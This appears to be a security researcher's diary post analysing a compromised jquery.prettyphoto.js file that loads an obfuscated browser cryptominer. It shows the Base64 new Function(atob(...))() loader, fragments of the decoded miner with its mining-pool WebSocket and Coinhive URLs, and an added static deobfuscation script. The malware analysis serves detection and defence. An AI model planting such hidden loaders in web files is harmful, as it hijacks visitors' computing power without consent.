Cryptominer Delivered Through Compromised JavaScript File

Published: 2018-07-13
Last Updated: 2018-07-13 06:20:13 UTC
by Xavier Mertens (Version: 1)

Yesterday I found an interesting compromised JavaScript file that contains extra code to perform crypto mining activities. It started with a customer's IDS alerts on the following URL:

hxxp://safeyourhealth[.]ru/wp-content/themes/wp-trustme/js/jquery.prettyphoto.js

This website is not flagged as malicious and the domain looks clean. When you point your browser to the site, it loads the JavaScript file. So, I performed some investigations on this URL. jquery.prettyphoto.js is a file from the prettyPhoto package[1], but the one hosted on safeyourhealth[.]ru was modified.

The original one starts like this:

(function($) { 
    $.prettyPhoto = {version: '3.1.4'};

    $.fn.prettyPhoto = function(pp_settings) { 
        pp_settings = jQuery.extend({ 
...

The malicious one started like this:

new Function(atob("dmFyIF8weDQ5ZTY9WydjYW5jZWxlZ...Y5ZignMHgyNycpXSgpOw=="))()
(function($){$.prettyPhoto={version:'3.1.4'};$.fn.prettyPhoto=function(pp_settings){pp_settings=jQuery.extend({hook:'rel',animation_speed:'fast',ajaxcallback:function()
...

The file was submitted to VT and received a score of 1/59[2]. atob() is the JavaScript function that decodes Base64, and new Function(...)() compiles and runs the decoded string as code, so the whole first line is a loader for a hidden payload. Let's extract the payload and decode it without running it:

$ curl --socks5 ten:9050 hxxp://safeyourhealth[.]ru/wp-content/themes/wp-trustme/js/jquery.prettyphoto.js | \
  grep atob | \
  awk -F '"' '{ print $2 }' | \
  base64 -d >jquery.prettyphoto.js.decoded
$ cat jquery.prettyphoto.js.decoded
var _0x49e6=['canceled','error','opt_in_canceled','_connect','lastPingReceived','getItem','parse','ident','_updateTabs','waitReconnect','dontKillTabUpdate','setItem','stringify','stats','_hashString','charCodeAt','WEBSOCKET_SHARDS','_onMessage','onerror','_onError','onclose','onopen','_onOpen','anonymous','user','toString','type','token','goal','ref','opt_in','_send','_onClose','code','job','enabled','_adjustThreads','hash_accepted','hashes','accepted','authed','Bee\x20Error:','invalid_site_key','invalid_opt_in','reset','banned','_onTargetMet','job_id','submit','nonce','result','_onVerified','send','some_code','ifExclusiveTab','FORCE_EXCLUSIVE_TAB','forceExclusiveTab','forceMultiTab','User','Anonymous','Res','URL','webkitURL','mozURL','createObjectURL','worker','onReady','currentJob','verifyJob','verifyCallback','_isReady','lastMessageTimestamp','ready','Expecting\x20first\x20message\x20to\x20be\x20\x22ready\x22,\x20got\x
...

The script is obfuscated with a very big array (_0x49e6) that holds the strings the code needs; instead of appearing inline, they are looked up by hex index through an accessor function (_0x169f in the snippets below). Even so, you can easily spot the behaviour of the script from the following snippet of code:

var _0x348ae9 = navigator['hardwareConcurrency'] || 4;

navigator.hardwareConcurrency is a read-only property that returns the number of logical processors available to run threads on the machine. That is always useful for a cryptominer to know: it tells the miner how many worker threads it can start (here with a fallback of 4 if the browser does not expose the value).

Even though the code is obfuscated, not all strings are pulled from the array, and the more interesting ones are easy to find:

self[_0x169f('0x98')][_0x169f('0x4b')] = {
    'LIB_URL': _0x169f('0xb2'),
    'ASMJS_NAME': _0x169f('0xb3'),
    'REQUIRES_AUTH': ![],   // ![] is the obfuscator's way of writing false
    'WEBSOCKET_SHARDS': [['wss://wss.rand.com.ru:8843/']],
    'CAPTCHA_URL': 'https://coinhive.com/captcha/',
    'MINER_URL': _0x169f('0xb4'),
    'AUTH_URL': 'https://authedmine.com/authenticate.html'
};
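The extraction and deobfuscation steps above (the new Function(atob(...))() loader, the _0x49e6 string array and the _0x169f('0x..') lookups in the configuration object) can be done statically, without ever executing the sample. The following is an added example written for this page; it is neither the diary's code nor the miner's. It assumes Node.js (for Buffer), and the inner payload and outer file it works on are constructed for the example: the array name _0x49e6, the accessor name _0x169f and the hex-index calling convention mirror the diary, but the accessor is assumed to be a plain "index minus constant offset" lookup with no array rotation, which real samples may add; all URLs in it are placeholders.

```javascript
// Added example (not code from the diary, nor from the miner itself): static
// extraction of a prepended "new Function(atob(...))()" loader and partial
// deobfuscation of a javascript-obfuscator style string array, without ever
// executing the sample. Assumes Node.js (Buffer). The inner payload and outer
// file below are CONSTRUCTED for this example; the array name _0x49e6, the
// accessor name _0x169f and the hex-index calls mirror the diary, but the
// accessor is assumed to be a plain "index minus constant offset" lookup with
// no array rotation, which real samples may add. URLs are placeholders.

const INNER_PAYLOAD =
  "var _0x49e6=['Miner','CONFIG','Bee\\x20Error:','wss://example.invalid:8843/'," +
  "'https://example.invalid/lib.js','miner.asm.js','https://example.invalid/miner.js'];" +
  "var _0x169f=function(_0x1,_0x2){_0x1=_0x1-0x0;var _0x3=_0x49e6[_0x1];return _0x3;};" +
  "self[_0x169f('0x0')][_0x169f('0x1')]={'LIB_URL':_0x169f('0x4')," +
  "'ASMJS_NAME':_0x169f('0x5'),'REQUIRES_AUTH':![]," +
  "'WEBSOCKET_SHARDS':[[_0x169f('0x3')]],'MINER_URL':_0x169f('0x6')};";

// Constructed outer file: the loader line prepended to a trimmed legitimate library.
const SAMPLE_FILE =
  'new Function(atob("' + Buffer.from(INNER_PAYLOAD, 'latin1').toString('base64') + '"))()\n' +
  "(function($){$.prettyPhoto={version:'3.1.4'};})(jQuery);\n";

// Step 1: pull the Base64 argument out of the loader and decode it. atob()
// yields a "binary" string, which latin1 reproduces byte for byte.
function extractAtobPayload(source) {
  const m = /new Function\(atob\((["'])([A-Za-z0-9+/=]+)\1\)\)\(\)/.exec(source);
  return m ? Buffer.from(m[2], 'base64').toString('latin1') : null;
}

// Undo the \xHH and \' escapes the obfuscator uses inside the array literal.
function unescapeJsString(s) {
  return s
    .replace(/\\x([0-9a-fA-F]{2})/g, (_, h) => String.fromCharCode(parseInt(h, 16)))
    .replace(/\\(['"\\])/g, '$1');
}

// Step 2: locate "var <name>=['...','...'];" and return its decoded elements.
function parseStringArray(payload) {
  const m = /var (_0x[0-9a-f]+)=\[((?:'(?:\\.|[^'\\])*'\s*,?\s*)*)\];/i.exec(payload);
  if (!m) return null;
  const strings = [];
  const re = /'((?:\\.|[^'\\])*)'/g;
  let s;
  while ((s = re.exec(m[2])) !== null) strings.push(unescapeJsString(s[1]));
  return { name: m[1], strings };
}

// Step 3: find the accessor that indexes the array and its constant offset
// (the "-0x0" in the constructed sample); offset 0 if none is present.
function findAccessor(payload, arrayName) {
  const re = new RegExp(
    'var (_0x[0-9a-f]+)=function\\(([^)]*)\\)\\{([^}]*' + arrayName + '\\[[^}]*)\\}', 'i');
  const m = re.exec(payload);
  if (!m) return null;
  const off = /-(0x[0-9a-f]+)/i.exec(m[3]);
  return { name: m[1], offset: off ? parseInt(off[1], 16) : 0 };
}

// Step 4: rewrite every accessor call to the literal it resolves to and turn the
// obfuscator's boolean idioms (![] / !![]) back into false / true.
function resolveStrings(payload) {
  const arr = parseStringArray(payload);
  const acc = arr && findAccessor(payload, arr.name);
  if (!acc) return payload;
  const callRe = new RegExp(acc.name + "\\('(0x[0-9a-f]+)'\\)", 'gi');
  return payload
    .replace(callRe, (match, hex) => {
      const value = arr.strings[parseInt(hex, 16) - acc.offset];
      return value === undefined ? match : JSON.stringify(value);
    })
    .replace(/!!\[\]/g, 'true')
    .replace(/!\[\]/g, 'false');
}

// Step 5: lift the miner configuration object out of the resolved code. After
// step 4 the values are JSON strings; only the single-quoted keys need converting.
function extractConfig(resolved) {
  const m = /=(\{'LIB_URL'[^}]*\})/.exec(resolved);
  if (!m) return null;
  const json = m[1].replace(/'((?:\\.|[^'\\])*)'/g, (_, s) => JSON.stringify(unescapeJsString(s)));
  return JSON.parse(json);
}

// Whole chain: outer file -> decoded loader payload -> resolved strings -> config.
function analyse(source) {
  const inner = extractAtobPayload(source);
  if (inner === null) return null;
  const resolved = resolveStrings(inner);
  return { inner, resolved, config: extractConfig(resolved) };
}

const REPORT = analyse(SAMPLE_FILE);
console.log(REPORT.resolved);
console.log(JSON.stringify(REPORT.config, null, 2));
```

Running it prints the inner code with every _0x169f('0x..') call replaced by its string and the configuration object as plain JSON, so the WebSocket shard, library and miner URLs can be read off and fed to blocklists or hunting rules without giving the sample a JavaScript engine to run in. On a real file, check the accessor body first: if it rotates the array (a loop that shifts elements before the lookup) the offset-only assumption here is not enough.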

I wrote a VTI hunting rule to search for scripts containing the string "navigator['hardwareConcurrency']" and I got some hits last night. All of them were submitted for the first time yesterday and got a score of 6/59:
All of them use the same IP address: 148.251.136.203.

I also searched for similar compromised jquery.prettyphoto.js files. This code is used on many websites, but I did not find other malicious occurrences. Please share if you find some.

[1] https://github.com/scaron/prettyphoto
[2] https://www.virustotal.com/#/file/977a811695dbbd370e162807e4c0fbc25c9fda8bba3417279c2f8ee1289a47e6/detection

Xavier Mertens (@xme)
ISC Handler - Freelance Security Consultant
